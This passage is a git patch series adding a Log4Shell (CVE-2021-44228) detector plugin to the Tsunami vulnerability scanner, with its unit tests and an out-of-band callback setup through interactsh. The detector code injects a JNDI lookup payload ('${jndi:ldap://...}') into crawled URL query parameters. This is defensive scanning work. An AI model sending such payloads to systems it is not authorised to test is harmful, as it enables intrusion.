+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202144228;
+
+import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+import static com.google.tsunami.plugins.detectors.cves.cve202144228.Cve202144228VulnDetector.OOB_DOMAIN;
+import static com.google.tsunami.plugins.detectors.cves.cve202144228.Cve202144228VulnDetector.VULN_DESCRIPTION;
+
+import com.google.common.collect.ImmutableList;
+import com.google.inject.Guice;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.net.http.HttpClientModule;
+import com.google.tsunami.common.net.http.HttpStatus;
+import com.google.tsunami.common.time.testing.FakeUtcClock;
+import com.google.tsunami.common.time.testing.FakeUtcClockModule;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.Software;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.TransportProtocol;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.net.InetAddress;
+import java.net.UnknownHostException;
+import java.time.Instant;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.Dispatcher;
+import okhttp3.mockwebserver.MockResponse;
+import okhttp3.mockwebserver.MockWebServer;
+import okhttp3.mockwebserver.RecordedRequest;
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
+
+/**
+ * Unit tests for {@link Cve202144228VulnDetector}.
+ */
+@RunWith(JUnit4.class)
+public final class Cve202144228VuLnDetectorTest {
+
+  private final FakeUtcClock fakeUtcClock =
+      FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z"));
+
+  @Inject
+  private Cve202144228VulnDetector detector;
+
+  private MockWebServer mockWebServer;
+
+  @Before
+  public void setUp() {
+    mockWebServer = new MockWebServer();
+    Guice.createInjector(
+        new FakeUtcClockModule(fakeUtcClock),
+        new Cve202144228DetectorBootstrapModule(),
+        new HttpClientModule.Builder().build())
+        .injectMembers(this);
+  }
+
+  @After
+  public void tearDown() throws IOException {
+    mockWebServer.shutdown();
+  }
+
+  @Test
+  public void detect_whenVulnerable_returnsVulnerability() throws IOException {
+    detector.initOOBDomain();
+    System.out.println("OOB_DOMAIN:" + OOB_DOMAIN);
+    try {
+      InetAddress.getByName(OOB_DOMAIN);
+    } catch (UnknownHostException e) {
+      e.printStackTrace();
+    }
+    mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher());
+    mockWebServer.start();
+    NetworkService service =
+        NetworkService.newBuilder()
+            .setNetworkEndpoint(
+                forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+            .setTransportProtocol(TransportProtocol.TCP)
+            .setSoftware(Software.newBuilder().setName("http"))
+            .setServiceName("http")
+            .build();
+    TargetInfo targetInfo =
+        TargetInfo.newBuilder()
+            .addNetworkEndpoints(forHostname(mockWebServer.getHostName()))
+            .build();
+
+    DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service));
+
+    assertThat(detectionReports.getDetectionReportsList())
+        .containsExactly(
+            DetectionReport.newBuilder()
+                .setTargetInfo(targetInfo)
+                .setNetworkService(service)
+                .setDetectionTimestamp(
+                    Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli()))
+                .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+                .setVulnerability(
+                    Vulnerability.newBuilder()
+                        .setMainId(
+                            VulnerabilityId.newBuilder()
+                                .setPublisher("TSUNAMI_COMMUNITY")
+                                .setValue("CVE_2021_44228"))
+                        .setSeverity(Severity.CRITICAL)
+                        .setTitle("CVE-2021-44228 Apache Log4j2 <=2.14.1 JNDI RCE")
+                        .setRecommendation(
+                            "In previous releases (>=2.10) this behavior can be mitigated by "
+                                + "setting system property \"log4j2.formatMsgNoLookups\" to “true” "
+                                + "or by removing the JndiLookup class from the classpath (example:"
+                                + " zip -q -d log4j-core-*.jar "
+                                + "org/apache/logging/log4j/core/lookup/JndiLookup.class). Java "
+                                + "8u121 (see https://www.oracle.com/java/technologies/javase/"
+                                + "8u121-relnotes.html) protects against RCE by defaulting "
+                                + "\"com.sun.jndi.rmi.object.trustURLCodebase\" and "
+                                + "\"com.sun.jndi.cosnaming.object.trustURLCodebase\" to "
+                                + "\"false\".")
+                        .setDescription(VULN_DESCRIPTION)).build());
+  }
+
+  @Test
+  public void detect_whenNotVulnerable_returnsNoVulnerability() throws IOException {
+    mockWebServer.setDispatcher(new SafeEndpointDispatcher());
+    mockWebServer.start();
+    ImmutableList<NetworkService> httpServices =
+        ImmutableList.of(
+            NetworkService.newBuilder()
+                .setNetworkEndpoint(
+                    forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+                .setTransportProtocol(TransportProtocol.TCP)
+                .setServiceName("http")
+                .build());
+    TargetInfo targetInfo =
+        TargetInfo.newBuilder()
+            .addNetworkEndpoints(forHostname(mockWebServer.getHostName()))
+            .build();
+
+    DetectionReportList detectionReports = detector.detect(targetInfo, httpServices);
+
+    assertThat(detectionReports.getDetectionReportsList()).isEmpty();
+  }
+
+  static final class SafeEndpointDispatcher extends Dispatcher {
+
+    @Override
+    public MockResponse dispatch(RecordedRequest recordedRequest) {
+      return new MockResponse().setResponseCode(HttpStatus.OK.code());
+    }
+  }
+
+  static final class VulnerabilityEndpointDispatcher extends Dispatcher {
+
+    @Override
+    public MockResponse dispatch(RecordedRequest recordedRequest) {
+      if ("/".equals(recordedRequest.getPath())) {
+        return new MockResponse().setResponseCode(HttpStatus.OK.code())
+            .setBody("<a href='/log4j?id=a'>test</a>");
+      }
+
+      if ("/log4j".equals(recordedRequest.getPath())) {
+        return new MockResponse().setResponseCode(HttpStatus.OK.code())
+            .setBody(recordedRequest.getRequestUrl().toString());
+      }
+      return new MockResponse().setResponseCode(HttpStatus.OK.code());
+    }
+  }
+}

From e38a369215b9d96cc6705add820502511a3f38e0 Mon Sep 17 00:00:00 2001
From: hh-hunter <git@uuid.club>
Date: Sat, 11 Dec 2021 15:29:21 +0800
Subject: [PATCH 2/4] change cve number

---
 community/detectors/log4j_rce/build.gradle | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/community/detectors/log4j_rce/build.gradle b/community/detectors/log4j_rce/build.gradle
index 38a616f08..b9eb150c3 100644
--- a/community/detectors/log4j_rce/build.gradle
+++ b/community/detectors/log4j_rce/build.gradle
@@ -3,7 +3,7 @@ plugins {
     id 'com.google.protobuf' version "0.8.14"
 }
 
-description = 'Tsunami CVE-2021-29441 VulnDetector plugin.'
+description = 'Tsunami CVE-2021-44228 VulnDetector plugin.'
 group 'com.google.tsunami'
 version '0.0.1-SNAPSHOT'
 

From af0c4d82ec93ef1fce18db27e258ab20a7453dda Mon Sep 17 00:00:00 2001
From: hh-hunter <git@uuid.club>
Date: Sat, 11 Dec 2021 18:00:01 +0800
Subject: [PATCH 3/4] change oob provider for interactsh

---
 community/detectors/log4j_rce/build.gradle    |   4 +-
 .../Cve202144228VulnDetector.java             | 183 ++++++++++++++----
 .../Cve202144228VuLnDetectorTest.java         |   7 +-
 3 files changed, 147 insertions(+), 47 deletions(-)

diff --git a/community/detectors/log4j_rce/build.gradle b/community/detectors/log4j_rce/build.gradle
index b9eb150c3..4735869e7 100644
--- a/community/detectors/log4j_rce/build.gradle
+++ b/community/detectors/log4j_rce/build.gradle
@@ -17,7 +17,6 @@ repositories {
 }
 
 
-
 java {
     sourceCompatibility = JavaVersion.VERSION_1_8
     targetCompatibility = JavaVersion.VERSION_1_8
@@ -58,6 +57,7 @@ ext {
     okhttpVersion = '3.12.0'
     protobufVersion = '3.11.4'
     jsoupVersion = '1.9.2'
+    bouncycastleVersion = '1.70'
 }
 
 protobuf {
@@ -73,6 +73,8 @@ dependencies {
     implementation "com.google.protobuf:protobuf-javalite:${protobufVersion}"
     implementation "com.google.protobuf:protobuf-java-util:${protobufVersion}"
     implementation "org.jsoup:jsoup:${jsoupVersion}"
+    implementation 'org.bouncycastle:bcprov-jdk15on:${bouncycastleVersion}'
+
 
     testImplementation "junit:junit:${junitVersion}"
     testImplementation "org.mockito:mockito-core:${mockitoVersion}"
diff --git a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java
index 8e3e2ecf2..a1cb22a66 100644
--- a/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java
+++ b/community/detectors/log4j_rce/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VulnDetector.java
@@ -17,8 +17,6 @@
 
 import static com.google.common.base.Preconditions.checkNotNull;
 import static com.google.common.collect.ImmutableList.toImmutableList;
-import static com.google.common.net.HttpHeaders.COOKIE;
-import static com.google.common.net.HttpHeaders.SET_COOKIE;
 import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority;
 import static java.nio.charset.StandardCharsets.UTF_8;
 
@@ -26,11 +24,11 @@
 import com.google.common.collect.ImmutableList;
 import com.google.common.collect.ImmutableSet;
 import com.google.common.flogger.GoogleLogger;
+import com.google.gson.Gson;
 import com.google.protobuf.ByteString;
 import com.google.protobuf.util.Timestamps;
 import com.google.tsunami.common.data.NetworkServiceUtils;
 import com.google.tsunami.common.net.http.HttpClient;
-import com.google.tsunami.common.net.http.HttpHeaders;
 import com.google.tsunami.common.net.http.HttpRequest;
 import com.google.tsunami.common.net.http.HttpResponse;
 import com.google.tsunami.common.net.http.HttpStatus;
@@ -50,16 +48,37 @@
 import com.google.tsunami.proto.TargetInfo;
 import com.google.tsunami.proto.Vulnerability;
 import com.google.tsunami.proto.VulnerabilityId;
+import java.io.ByteArrayOutputStream;
 import java.io.IOException;
+import java.io.OutputStreamWriter;
 import java.io.UnsupportedEncodingException;
 import java.net.URLEncoder;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.NoSuchAlgorithmException;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.spec.MGF1ParameterSpec;
 import java.time.Clock;
 import java.time.Instant;
 import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.Base64;
 import java.util.HashMap;
 import java.util.List;
+import java.util.Locale;
 import java.util.Map;
+import java.util.Random;
+import java.util.UUID;
+import javax.crypto.Cipher;
+import javax.crypto.SecretKey;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.spec.OAEPParameterSpec;
+import javax.crypto.spec.PSource;
+import javax.crypto.spec.SecretKeySpec;
 import javax.inject.Inject;
+import org.bouncycastle.util.io.pem.PemObject;
+import org.bouncycastle.util.io.pem.PemWriter;
 
 /**
  * A {@link VulnDetector} that detects the CVE-2021-44228 vulnerability.
@@ -79,10 +98,9 @@
 public final class Cve202144228VulnDetector implements VulnDetector {
 
   public static String OOB_DOMAIN = "";
+  private PrivateKey privateKey;
   private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
-  private static int MAX_TRY_GET_OOB_DOMAIN = 6;
-  private static String PHP_SESSION = "";
-  private static String PAYLOAD = "${jndi:ldap://tsunami.OOB_DOMAIN/}";
+  private static String PAYLOAD = "${jndi:ldap://OOB_DOMAIN/}";
 
   @VisibleForTesting
   static final String VULN_DESCRIPTION =
@@ -95,12 +113,17 @@ public final class Cve202144228VulnDetector implements VulnDetector {
   private final HttpClient httpClient;
   private final Clock utcClock;
   private final Crawler crawler;
+  private final UUID secretKey;
+  private final String correlationId;
+
 
   @Inject
   Cve202144228VulnDetector(@UtcClock Clock utcClock, HttpClient httpClient, Crawler crawler) {
     this.httpClient = checkNotNull(httpClient);
     this.utcClock = checkNotNull(utcClock);
     this.crawler = checkNotNull(crawler);
+    this.secretKey = UUID.randomUUID();
+    this.correlationId = getRandomString(20);
   }
 
   @Override
@@ -197,24 +220,31 @@ private boolean checkPostVulnerable(NetworkService networkService,
   }
 
   public void initOOBDomain() {
-    try {
-      if ("".equals(OOB_DOMAIN)) {
+    if ("".equals(OOB_DOMAIN)) {
+      try {
+        KeyPair keyPair = generateRsaKeyPair();
+        privateKey = keyPair.getPrivate();
+        PublicKey publicKey = keyPair.getPublic();
+        PemObject pemObject = new PemObject("PUBLIC KEY", publicKey.getEncoded());
+        ByteArrayOutputStream pubKeyByteStream = new ByteArrayOutputStream();
+        PemWriter pemWriter = new PemWriter(new OutputStreamWriter(pubKeyByteStream));
+        pemWriter.writeObject(pemObject);
+        pemWriter.close();
+        String pubKeyEncoded =
+            new String(Base64.getEncoder().encode(pubKeyByteStream.toByteArray()));
+
+        String registerData = String
+            .format("{\"public-key\":\"%s\",\"secret-key\":\"%s\",\"correlation-id\":\"%s\"}",
+                pubKeyEncoded, this.secretKey, this.correlationId);
         HttpResponse response = httpClient
-            .send(HttpRequest.get("http://www.dnslog.cn/getdomain.php").withEmptyHeaders().build());
-        if (HttpStatus.OK.equals(response.status())) {
-          OOB_DOMAIN = response.bodyString().get();
-          PAYLOAD = PAYLOAD.replace("OOB_DOMAIN", OOB_DOMAIN);
-          PHP_SESSION = response.headers().get(SET_COOKIE).get().replace("path=/", "");
-          logger.atInfo().log("Request oob domain %s success", OOB_DOMAIN);
+            .send(HttpRequest.post("https://interactsh.com/register").setRequestBody(
+                ByteString.copyFromUtf8(registerData)).withEmptyHeaders().build());
+        if (response.bodyString().get().contains("successful")) {
+          OOB_DOMAIN = "tsunami." + correlationId + "gdpdpreyyyyyb.interactsh.com";
+          logger.atInfo().log("Register interactsh oob domain %s success", OOB_DOMAIN);
         }
-      }
-    } catch (IOException e) {
-      if (e.getMessage().contains("timeout") && MAX_TRY_GET_OOB_DOMAIN > 0) {
-        logger.atWarning().log("Request to oob domain timeout,retrying...");
-        MAX_TRY_GET_OOB_DOMAIN = MAX_TRY_GET_OOB_DOMAIN - 1;
-        initOOBDomain();
-      } else {
-        logger.atWarning().withCause(e).log("Request to oob domain failed");
+      } catch (Exception e) {
+        logger.atWarning().withCause(e).log("Register interactsh oob domain failed");
       }
     }
   }
@@ -226,24 +256,20 @@ public void initOOBDomain() {
    */
   private boolean checkOOBData() {
     try {
-      MAX_TRY_GET_OOB_DOMAIN = 3;
-      Thread.sleep(10000);
-      // dnslog is not stable
-      HttpResponse response = httpClient
-          .send(HttpRequest.get("http://www.dnslog.cn/getrecords.php").setHeaders(
-              HttpHeaders.builder().addHeader(COOKIE, PHP_SESSION).build()).build());
-      if (HttpStatus.OK.equals(response.status()) && response.bodyString().get()
-          .contains("tsunami")) {
-        return true;
-      }
-    } catch (Exception e) {
-      if (e.getMessage().contains("timeout") && MAX_TRY_GET_OOB_DOMAIN > 0) {
-        logger.atWarning().log("Check oob domain result timeout,retrying...");
-        MAX_TRY_GET_OOB_DOMAIN = MAX_TRY_GET_OOB_DOMAIN - 1;
-        checkOOBData();
-      } else {
-        logger.atWarning().withCause(e).log("Check oob domain result failed");
+      String poolUrl = String
+          .format("https://interactsh.com/poll?id=%s&secret=%s", correlationId, secretKey);
+      HttpResponse response = httpClient.send(HttpRequest.get(poolUrl).withEmptyHeaders().build());
+      if (response.status() == HttpStatus.OK && response.bodyString().get().contains("aes_key")) {
+        PollData pollData = new Gson().fromJson(response.bodyString().get(), PollData.class);
+        for (String datum : pollData.getData()) {
+          String decryptMessage = new String(decryptMessage(pollData.getAes_key(), datum));
+          if (decryptMessage.contains("tsunami")) {
+            return true;
+          }
+        }
       }
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log("Check oob data failed");
     }
     return false;
   }
@@ -297,7 +323,7 @@ private List<String> buildNextGetUris(String startingUrl, String url) {
         if (queryString.contains("=") && queryString.split("=").length == 2) {
           String queryStringKey = queryString.split("=")[0];
           String newQueryString = queryStringKey + "=" +
-              URLEncoder.encode(PAYLOAD, UTF_8.toString());
+              URLEncoder.encode(PAYLOAD.replace("OOB_DOMAIN", OOB_DOMAIN), UTF_8.toString());
           String uri = query.replace(queryString, newQueryString);
           nextUriList.add(uri);
         }
@@ -371,4 +397,81 @@ private ImmutableSet<CrawlResult> crawlNetworkService(String seedingUrl,
             .build();
     return crawler.crawl(crawlConfig);
   }
+
+  private static KeyPair generateRsaKeyPair() throws NoSuchAlgorithmException {
+    KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
+    generator.initialize(2048);
+
+    KeyPair keyPair = generator.generateKeyPair();
+    logger.atInfo().log("Interactsh: RSA key pair generated.");
+    return keyPair;
+  }
+
+  private byte[] decryptMessage(String encodedEncryptedKey, String encodedEncryptedMsg) {
+    try {
+      byte[] decodedEncryptedKey = Base64.getDecoder().decode(encodedEncryptedKey);
+      Cipher decryptionCipher = Cipher.getInstance("RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING");
+      OAEPParameterSpec oaepParameterSpec =
+          new OAEPParameterSpec(
+              "SHA-256",
+              "MGF1",
+              MGF1ParameterSpec.SHA256,
+              PSource.PSpecified.DEFAULT);
+      decryptionCipher.init(Cipher.DECRYPT_MODE, this.privateKey, oaepParameterSpec);
+      byte[] decodedDecryptedKey = decryptionCipher.doFinal(decodedEncryptedKey);
+
+      byte[] decodedEncryptedMsg = Base64.getDecoder().decode(encodedEncryptedMsg);
+      decryptionCipher = Cipher.getInstance("AES/CFB/NoPadding");
+      SecretKey aesKey = new SecretKeySpec(decodedDecryptedKey, "AES");
+      IvParameterSpec iv =
+          new IvParameterSpec(
+              Arrays.copyOf(decodedEncryptedMsg, decryptionCipher.getBlockSize()));
+      decryptionCipher.init(Cipher.DECRYPT_MODE, aesKey, iv);
+      return decryptionCipher.doFinal(
+          Arrays.copyOfRange(
+              decodedEncryptedMsg,
+              decryptionCipher.getBlockSize(),
+              decodedEncryptedMsg.length));
+    } catch (Exception e) {
+      logger.atWarning().withCause(e).log("Could not decrypt Interactsh interactions");
+      return new byte[0];
+    }
+  }
+
+  public static String getRandomString(int length) {
+    String str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+    Random random = new Random();
+    StringBuffer sb = new StringBuffer();
+    for (int i = 0; i < length; i++) {
+      int number = random.nextInt(62);
+      sb.append(str.charAt(number));
+    }
+    return sb.toString().toLowerCase(Locale.ROOT);
+  }
+
+  class PollData {
+
+    private String[] data;
+    private String aes_key;
+
+    public String[] getData() {
+      return data;
+    }
+
+    public void setData(String[] data) {
+      this.data = data;
+    }
+
+    public String getAes_key() {
+      return aes_key;
+    }
+
+    public void setAes_key(String aes_key) {
+      this.aes_key = aes_key;
+    }
+
+
+  }
+
+
 }
diff --git a/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java b/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java
index 3a6c161f9..a45c9ab77 100644
--- a/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java
+++ b/community/detectors/log4j_rce/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202144228/Cve202144228VuLnDetectorTest.java
@@ -85,12 +85,7 @@ public void tearDown() throws IOException {
   @Test
   public void detect_whenVulnerable_returnsVulnerability() throws IOException {
     detector.initOOBDomain();
-    System.out.println("OOB_DOMAIN:" + OOB_DOMAIN);
-    try {
-      InetAddress.getByName(OOB_DOMAIN);
-    } catch (UnknownHostException e) {
-      e.printStackTrace();
-    }
+    InetAddress.getByName(OOB_DOMAIN);
     mockWebServer.setDispatcher(new VulnerabilityEndpointDispatcher());
     mockWebServer.start();
     NetworkService service =

From 293f15739a0941bd6bae347164f674ce111a51aa Mon Sep 17 00:00:00 2001
From: hh-hunter <git@uuid.club>
Date: Sat, 11 Dec 2021 18:02:52 +0800
Subject: [PATCH 4/4] change dependencie

---
 community/detectors/log4j_rce/build.gradle | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/community/detectors/log4j_rce/build.gradle b/community/detectors/log4j_rce/build.gradle
index 4735869e7..9c5ccf36c 100644
--- a/community/detectors/log4j_rce/build.gradle
+++ b/community/detectors/log4j_rce/build.gradle
@@ -73,7 +73,7 @@ dependencies {
     implementation "com.google.protobuf:protobuf-javalite:${protobufVersion}"
     implementation "com.google.protobuf:protobuf-java-util:${protobufVersion}"
     implementation "org.jsoup:jsoup:${jsoupVersion}"
-    implementation 'org.bouncycastle:bcprov-jdk15on:${bouncycastleVersion}'
+    implementation "org.bouncycastle:bcprov-jdk15on:${bouncycastleVersion}"
 
 
     testImplementation "junit:junit:${junitVersion}"